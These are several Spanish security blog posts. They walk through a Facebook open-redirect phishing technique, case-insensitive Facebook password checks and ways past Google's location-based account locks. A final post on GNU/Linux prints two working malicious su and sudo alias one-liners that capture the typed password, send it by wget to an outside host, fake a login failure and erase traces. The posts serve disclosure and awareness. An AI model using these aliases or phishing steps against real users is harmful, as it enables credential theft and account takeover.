Un Redirect en Facebook para hacer Phishing a Facebook

A travs de Twitter pude ver un mensaje de Jonathan Funes (@xfunex) que aluda a un No-
Bug de Facebook. Es decir, a algo que l consideraba un bug pero que tras haber contactado con
el equipo de seguridad de la red social por excelencia, le haban dicho que eso no era un bug, algo
similar a lo que le pas a otro investigador de seguridad con una "caracterstica" que le permiti
cambiar un estado del propio Mark Zuckerberg.

Como me interesaba el tema le ped ms informacin, y me pas una pequea explicacin en vdeo
que os paso describir. En este caso se trata de algo bastante sencillo de reproducir, as que puedes
probarlo t mismo con tu cuenta de Facebook. La idea es aprovechar un Open-
Redirect de Facebook para hacer un ataque de Phishing bastante convincente a la
propia Facebook.

Paso 1: Crate una mensaje privado que solo puedas ver t con un enlace a cualquier web que
quieras usando el enlace al link de redireccin que puedes ver en la imagen. Lo nico que necesitas
es poner la direccin al final de la URL. En este caso, cuando alguien haga clic en ese enlace ir a
la pgina de Google.com

Figura 1: Creando un estado que publique el link de redireccin a Google.

El dominio del enlace de publicacin aparece como www.facebook.com

Como se puede ver, automticamente aparece que el dominio al que apunta ese enlace es
a www.facebook.com, pero realmente es un hiperenlace que lleva a Google.com sin mostrar
ningn mensaje de alerta.

Paso 2: Edita el ttulo de la web para poner algo significativo, en este caso yo no me he complicado
y he puesto que es un enlace de www.facebook.com, para que coincida con el dominio de
publicacin del enlace que Facebook cre antes.
 Figura 2: Cambiando el ttulo del enlace publicado

Paso 3: Borra el enlace original y pon textos sugerentes que inciten a los que lo vean a pulsar sobre
l. Aqu llega la parte de ingeniera social necesaria para conseguir el call-to-action de las
personas que lo vean.

Figura 3: Poniendo textos sugerentes en la publicacin del phishing

Paso 4: Publica el estado. Como se puede ver, queda bastante aparente y parece que es un enlace
a una web de Facebook.
 Figura 4: El enlace publicado parece una pgina de Facebook

Paso 5: Sin embargo, como se puede ver en el enlace, el hipervnculo es a Google.com y navegar
a esa direccin sin mostrar ninguna alerta.

Figura 5: El enlace llevar a Google.com sin dar ninguna alerta

En este ejemplo yo he utilizado un destino que llama mucho la atencin, como es Google.com,
pero si alguien quisiera hacer un ataque dirigido a uno de sus seguidores podra elegir un dominio
en el que se simulara la pgina de Facebook y pidiera el usuario y la contrasea de Facebook para
robrsela.

En el vdeo de la demostracin, Jonathan Funes usa un BeeF para infectar con

un JavaScript malicioso la sesin del usuario - algo similar a lo que hicimos con la JavaScript
Botnet -, pero lo ms recomendable sera utilizar SET con Metasploit para conseguir un efecto
de Phishing perfecto que pudiera ponerse en cualquier dominio o subdominio que pueda engaar
a la vctima.

Figura 6: Explotacin del Open-Redirection en Facebook

Ten cuidado con estas cosas, porque parece que de momento Facebook no piensa corregir o aadir
alguna proteccin extra a esta caracterstica de comparticin de enlaces y uso del Open-
Redirect que tienen implementado, as que atento para no caer en esquemas de phishing porque
te hayas fiado en el dominio de publicacin del enlace.

Saludos Malignos!

Tu cuenta de Facebook tiene 3 passwords y t no lo sabes

Entre los muchos correos electrnicos que recibo hay muchos de gente que me cuenta que ha
descubierto alguna cosa que tiene que ver con seguridad, lo que me ayuda a estar un poco ms al
da de lo que est sucediendo en el mundo de la seguridad. De todos ellos, hay algunos que suelen
ser errneos o que directamente no han hecho las pruebas. Por eso, cuando los leo, procuro intentar
discernir si lo que me cuentan tiene sentido o no. Hoy os voy a hablar de uno de esos que result
ser un misterio sin resolver.

El misterio de las passwords sin cifrar de Facebook

Uno de esos correos lleg con un asunto que deca "Contraseas sin cifrar en Facebook". Mi
primera suposicin era que me iba a preguntar algo referente al artculo que escrib sobre cmo
conseguir que las credenciales de Facebook se capturen por la red sin cifrado, pero no, no era eso.
Cuando segu leyendo el mensaje, me deca que se haba dado cuenta de que en su cuenta
de Facebook poda entrar con la contrasea escrita en maysculas cuando su contrasea est
escrita en minsculas, lo que para l significaba que Facebook no hashea las passwords en MD5.

Lgicamente no me lo cre y le dije que era imposible. Tengo claro que Facebook guarda hashes de
las contraseas y por supuesto no va a ser en MD5. Ya usarn un SHA2 con algn Salt o similares.
Conociendo a la gente de seguridad que hay detrs de Facebook no iba ni a perder un minuto de
tiempo en comprobar algo as. Contest que no poda ser, que algo estara haciendo mal en sus
pruebas. Lo que pas por mi cabeza fue que seguramente tena cacheada la sesin o la contrasea
y por eso estaba teniendo acceso. An as, prob a escribir todas las letras de mi contrasea
de Facebook primero todo en minsculas y luego todo en maysculas y no funcion, por lo que
contest que a m no funcionaba

Sin embargo, insisti y me grab un vdeo, por lo que despus de un par de das decid ver el vdeo
y probarlo con otra cuenta que me cree desde cero y volvi a fallarme. Algo no iba bien y tena
que ser en su equipo. Cmo va a funcionar una contrasea distinta cuando esto 100% seguro
de que Facebook hace hashing de passwords? Y le contest a David Guzmn - que as se llama
mi interlocutor - que volv a probarlo con una password que tena letras y nmeros y no me
funcion.

La prueba que yo hice fue crearme una cuenta con una clave aAa777 (en el vdeo est mal) e
intentar entrar con aaa777 y con AAA777 y no funcion, por lo que le envi a David un correo
dicindolo que haba intentado entrar como l me deca y no haba tenido xito. Quiso el corrector
o el destino que al escribir la contrasea de la cuenta escribiera mal la password en el mensaje y
pusiera la segunda "A" en minscula, as David me hizo este vdeo donde se poda entrar y a m me
permiti resolver el misterio y encajar las piezas.

Figura 1: El vdeo de la cuenta de Facebook con mltiples passwords

La resolucin al misterio de las mltiples passwords de Facebook

En el vdeo se puede ver que con una contrasea como aaa777 se puede entrar en el sistema
usando tambin AAA777 y Aaa777, pero yo estaba seguro que con la password aAa77 no
funcionaban ni aaa777 ni AAA777. Por supuesto, segua teniendo claro que Facebook est
haciendo hashing, as que... qu podra estar pasando?
Tras probar todas las combinaciones me di cuenta de que las passwords que funcionan son dos:
1.- Passwords que se pueden escribir cuando tienes el Bloq+Mays activadas. Es decir, no es
que pongas la contrasea todo en maysculas o todo en minsculas, es que hagas una inversin de
las letras. Es decir, si tu password es aBcDeF11 entonces tambin es tu password AbCdEf11. Esto
quiere decir que al menos tienes doss passwords.
2.- Passwords que teniendo la primera letra en minscula, se escribe en mayscula. En muchos
controles de tablets, cuando se pulsa sobre un campo para introducir un texto, por usabilidad se
activa la tecla de Mays solo para la primera letra, lo que puede llevar a que si tu password
comienza por una letra minscula, como el ejemplo de aBcDeF11, entonces tambin te valga la
password ABcDeF11.
Tras encajar todo, las cosas cobran sentido. Lo que Facebook hace es probar esas posibilidades,
as que tu password de Facebook puede pasar de ser una a ser tres, solo porque las opciones de
usabilidad han ganado una vez ms la batalla a la seguridad. De esta forma se reducen problemas
de soporte con los usuarios que tienen el modo de maysculas activado sin querer o que usan una
conexin desde un control que pone la primera letra en maysculas de forma automtica.

Actualizacin: Facebook reconoce este hecho y explica que este es uno de los casos que no se
reconoce como fallo de seguridad. Es su forma de ayudar a la usabilidad.

Figura 2: La explicacin oficial de Facebook

Actualizacin 2: Esta historia me inspir una reflexin para un No Lusers al vuelo con una maligna
reflexin de josemaricario.
 Figura 3: Se cambia la password si solo se cambian maysculas por minsculas?

Saludos Malignos!

Saltar el bloqueo de cuentas Google es un juego de nios

El robo de identidad es algo muy comn hoy en da, por eso hay que poner un segundo factor de
autenticacin a todas tus identidades si quieres evitar sustos innecesarios. En mi caso, me gustara
poner Latch como ya he hecho con mi Windows para saber cundo alguien intenta entrar en mi
cuenta con mi contrasea, pero mientas que no exista esa posibilidad en Google, uso Google
Authenticator que si bien no me avisa cuando alguien usa mi contrasea en mi cuenta y me obliga
a poner un cdigo cada vez que inicio sesin, al menos s que me tienen que robar el terminal para
lograr robarme la identidad.

Figura 1: Respuesta de Google Security sobre esto que os voy a contar

El poner un segundo factor de autenticacin es para m vital, sobre todo viendo las medidas de
seguridad que tienen empresas como Google para detectar y bloquear el robo de identidad
basndose en patrones de comportamiento. De todo esto que os voy a contar, avis a Google y
decidieron que NO era un fallo de seguridad. Tal vez luego lo arreglen como las URLs de Gmail
indexadas en Google y BING, pero por ahora no. Espero que os guste.
Inicio de sesin desde otra ubicacin

La cuestin es que ocurrira si alguien intenta acceder desde una ubicacin distinta a la que utiliza
el dueo de una cuenta de Google. No olvidemos que una de las caractersticas que argumentan
los grandes sitios de Internet a la hora de generar las huellas digitales de las conexiones de sus
clientes es la proteccin de las cuentas. En el caso concreto de Google, por seguridad, se bloqueara
dicha cuenta y comienza todo un proceso de seguridad para verificar que se trata del dueo
legitimo, tal y como explic Chema en sus pruebas con cuentas robadas y publicadas en foros de
Internet.

Figura 2: Verificar tu identidad de una cuenta de Gmail introduciendo cuenta de recuperacin

Si intentamos realizar el acceso a una cuenta desde una ubicacin distinta a la habitual, haciendo
una conexin directamente desde el login del correo electrnico de Gmail aparecer un desafo y
si no contestamos correctamente a todas las preguntas que se formulan - cosas que un atacante
probablemente no sepa - la cuenta seguir bloqueada. Hasta ese punto todo parece correcto,
pero... y si intentamos hacer login desde cualquier otra propiedad de Google?

El inicio desde otra ubicacin en YouTube

No hay que olvidar que la cuenta de Google hoy en da tiene muchas puertas, por ejemplo haciendo
login en YouTube. Se lanza el mismo proceso de seguridad? La respuesta es NO. En este caso, al
conectar por YouTube avisara de que alguien esta intentando entrar a tu cuenta desde otra
ubicacin y formula una pregunta: Desde qu ubicacin te sueles conectar normalmente? Esto ya
no es una barrera costosa, ya que para un atacante es fcil de averiguar con buscar un poco
en Internet.

Una vez conseguida dicha informacin se accede a la cuenta sin ningn problema. Si al mismo
tiempo el dueo legtimo de la identidad est conectado, aparecer un aviso en la parte superior
de la pagina de que alguien ha entrado a tu cuenta desde otra ubicacin y realiza otra pregunta
ms: Has sido tu? Con contestar que s es suficiente, y adis a ms preguntas al mismo tiempo
que se consigue acceso total a Todo Google.
Esto pasar nicamente si el atacante est navegando bajo una conexin con una direccin IP de
un pas diferente al del dueo de la cuenta, pero si es astuto y antes de conectarse se asegura de
obtener dicha informacin recogiendo informacin por las redes sociales podra elegir el pas de
conexin y se tendra acceso sin ningn problema.

El bug en el Bloqueo de seguridad por ubicacin distinta a habitual

Siguiendo con las pruebas, intent iniciar sesin en el login principal de Google desde otra
ubicacin a la habitual a la ma con conexin va VPN/Proxy con una direccin IP de "Estados
Unidos" quedando as la cuenta bloqueada "por seguridad". Para eliminar el bloqueo Google da
varias opciones de recuperacin:

Acceso mediante cuenta de correo de recuperacin

En esta primera opcin debes introducir la direccin de correo electrnico que tienes asociado a
tu cuenta de Google. Cualquiera que vea esto, asume que se va a enviar cualquier tipo de mensaje
de desafo a ese buzn de correo con algn cdigo y/o enlace para confirmar que se est en
posesin de esa direccin de correo electrnico. Sorpresa la ma cuando por error introduzco mal
el dominio de mi cuenta de correo electrnico y pongo algo como: "j@hotmail.crom"

Figura 3: Con el dominio mal puesto se tiene acceso a la cuenta, desbloqueando el control

. crom? dije yo llevndome la manos a la cabeza pensando que al haberlo puesto mal tendra que
repetir todo el proceso, pero... no, Te permite entrar. Pero...WTF?

Y si pongo un dominio totalmente distinto? Pues tambin cuela. Al final, lo nico que se comprueba
es que el nombre de la cuenta sea el correcto, por lo que el dominio no importa nada. De hecho,
cuando las cuentas de recuperacin son de los grandes proveedores de correo electrnico, no tiene
mucho sentido preguntarlo y es ms una forma de recordar al dueo qu cuenta se est preguntado.

Figura 4: Con un dominio no existente tambin se produce el desbloqueo

Lo ms sorprendente de todo es que Google NO realiza un desafo sobre el correo electrnico,

solo que has acertado en el nombre. Es decir, que no importa si el atacante no tiene control sobre
la cuenta de recuperacin, basta con que sepa qu cuenta... perdn, que alias de correo en esa
cuenta tiene. En este vdeo se puede ver todo el proceso de verificacin.

Figura 5: Desbloqueo de cuenta de Google desde ubicacin no habitual

Por desgracia, los usuarios tienden a poner el mismo nombre de usuario de su cuenta, pero en otro
dominio de correo. Algo como lucas11111@gmail.com, lucas1111@hotmail.com,
lucas1111@icloud.com, etctera. Mala idea para un caso de cuenta de recuperacin viendo como
funciona el sistema.

Acceso mediante conocimiento de la ubicacin habitual

Dependiendo de la propiedad de Google, al detectarse el acceso desde una ubicacin no habitual,

el desafo puede resolverse si se indica la ciudad desde la que suele iniciar sesin esa cuenta, en
mi caso "Palma de Mallorca, Espaa". Vamos, algo que est al alcance de casi cualquiera hoy en
da con saber dnde vive una persona mirando su vida en Internet y en las redes sociales. Es til
para algo esta proteccin?

Figura 6: Desbloqueo de cuentas por introduccin de ubicacin habitual

Lo cierto es que vistas estas opciones de seguridad para el bloqueo de cuenta, el uso de un segundo
factor de autenticacin es la nica medida eficiente para evitar que en un descuido, un 0day, una
troyano, un keylogger, o una conexin controlada entre todas las que se producen en la red con
mis cuentas, acabe con el robo de mi identidad.

Autor: Jonathan Novel

Twitter: @JonathanNovel

Ataques a GNU/Linux con alias maliciosos de su y sudo

A principios de este ao nos enteramos de que en mi centro de estudios iban a poner Linux en los
laboratorios de electrnica. En concreto estaban metiendo GNU/Linux Manjaro, una derivada
de Arch Linux en la que por seguridad, los usuarios utilizaran cuentas no privilegiadas para
trabajar y cuando fuera necesario pasaran a modo super usuario con un comando "su", para
gestionar software o hacer configuraciones.
 Figura 1: Cmo hacer ataques a sistemas GNU/Linux con alias maliciosos

El reto que se nos plante era ver si sera complejo o no robar las cuentas de los super
usuarios en los sistemas de este entorno, para ver si esto poda generar muchos problemas de
soporte o no. Con esto en mente, se me ocurri que una forma de robar las contraseas sera usar
un comando alias de los sistemas *NIX* para crear un falso "su" que me permitiera acceder a las
contraseas cuando se teclearan en una sesin de usuario no privilegiado para pasar a super
usuario. Os cuento el ataque paso a paso.

Paso 1: Control de la sesin no privilegiada

El primer objetivo es conseguir el acceso a una sesin no privilegiada del sistema. Esto puede
hacerse de muchas formas que van desde aprovechar un descuido de la sesin hasta "te paso
este ejercicio en este pendrive, ejecuta este programa que te copia todos los ficheros de
esta prctica" - para lo que yo me cre un pequeo script bash que descarga de Internet todo -
, o cualquier forma de conseguir una ejecucin de un script en el sistema. Un buen truco podra
ser utilizar un USB Rubber Ducky para ejecutarlo en un descuido de la vctima.

Figura 2: USB Rubber Ducky simula ser un pendrive pero es un teclado programado

No olvidis que esto est pensado para ataques que se realizan en entornos conocidos y la
ingeniera social es importante, como en el ejemplo de ataque que se public ayer, donde se
robaba la base de datos por medio de la apertura de un fichero Excel creado a medida.

Paso 2: Ejecucin del script que crea el falso alias de su

El script inicial, al que llam "aliasliado" crea un falso alias malicioso para su que simula un
fallo en la autenticacin cuando se introduce la contrasea que se requiere al ejecutar el
autentico comando "su". La idea es que cuando se ejecute el comando "su", realmente se
ejecutar el alias malicioso de "su". ste pedir la contrasea de super usuario, la robara, me
la enviara, mostrara un error de autenticacin y borrara todo. El script que crea este falso alias
es el siguiente:
alias su=' echo -n "Contrasea: " ; read -s PASS1 ; wget --background --quiet --output-
document=$HOME/.local/.wine32
"blogx86.net/aliasliado.php?victima=HackConcept&clave=$PASS1" > /dev/null ; echo "" ; sleep 3 ;
echo "su: Fallo de autenticacin" ; unalias su >> /dev/null 2>&1 ; unset PASS1 ; rm -f
$HOME/.local/.wine32 > /dev/null 2>&1 ; sed -e "/^alias su/d" ~/.bashrc > .temporal ; mv
.temporal ~/.bashrc '
Como se puede ver, una vez que se ejecuta el comando "su" va el alias malicioso, la contrasea
que se haya introducido ha volado a manos del atacante y se ha eliminado cualquier rastro de
infeccin dejando que el equipo funcione como estaba funcionando antes.

Paso 3: Una evolucin del ataque gracias a "melasudo"

Hablando ayer con Chema Alonso sobre la publicacin de este artculo, descubr que el equipo de
auditora web de Informtica 64 - ahora en Eleven Paths - hace un par de aos haba hecho lo
mismo, pero con el comando sudo, mucho ms efectivo para algunas distribuciones
de GNU/Linux como Ubuntu. En esos casos es script lo aprovechaban para ownear servidores
web en los que haban conseguido acceso no privilegiado con la cuenta del servidor web y queran
hacer una elevacin de privilegios.

Figura 3: Script de melasudo que crea un alias malicioso para sudo

El paso a paso est explicado en el artculo: "Melasudo: robar la password a un sudoer con
ingenio" En este alias malicioso, utilizan una llamada a un script oculto en el
directorio $HOME de la vctima que me ha gustado, as que he mezclado ambas ideas en el
siguiente alias malicioso para que sea mi "Chevrolet Camaro" en este tipo de ataques.
alias sudo=' echo -n "[sudo] password for $(whoami): " ; read -s PASS1 ; wget --background --quiet
--output-document=$HOME/.local/.wine32
"blogx86.net/aliasliado.php?victima=HackConcept&clave=$PASS1" > /dev/null ; echo "" ; sleep 3 ;
echo "Lo sentimos, vuelva a intentarlo." ; unalias sudo >> /dev/null 2>&1 ; unset PASS1 ; rm -f
$HOME/.local/.wine32 > /dev/null 2>&1 ; sed -e "/^alias su/d" ~/.bashrc > .temporal ; mv
.temporal ~/.bashrc ; sudo $1 $2 $3 $4 $5 $6 $7'
El siguiente vdeo muestra este script funcionando en un ataque. En l se puede ver cmo se
crea el alias malicioso, se roba la contrasea y luego todo queda igual que antes.

Figura 4: Vdeo demostracin de ataque con alias malicioso

Conclusiones

Cualquier punto de entrada sigue siendo potencialmente peligroso, ya sea un

fichero Excel, un USB Rubber Ducky que se conecta o un programa camuflado de cualquier
forma. Conseguir la ejecucin en un entorno no privilegiado sera el primer paso para conseguir
luego la elevacin de privilegios, aun con ayuda de un usuario.

Figura 5: Como conseguir una elevacin en Windows con infeccin de enlaces a aplicaciones no privilegidas

Hace tiempo, cuando Windows Vista implant UAC por defecto con el mximo nivel de
seguridad, ya se public en el ao 2007 una forma similar para lograr la elevacin de
privilegios infectando los enlaces a aplicaciones que el usuario no privilegiado tena, as que
como veis, el ataque se puede hacer igualmente en sistemas Windows.

Autor: Christian Prieto

Escritor del blog X86.net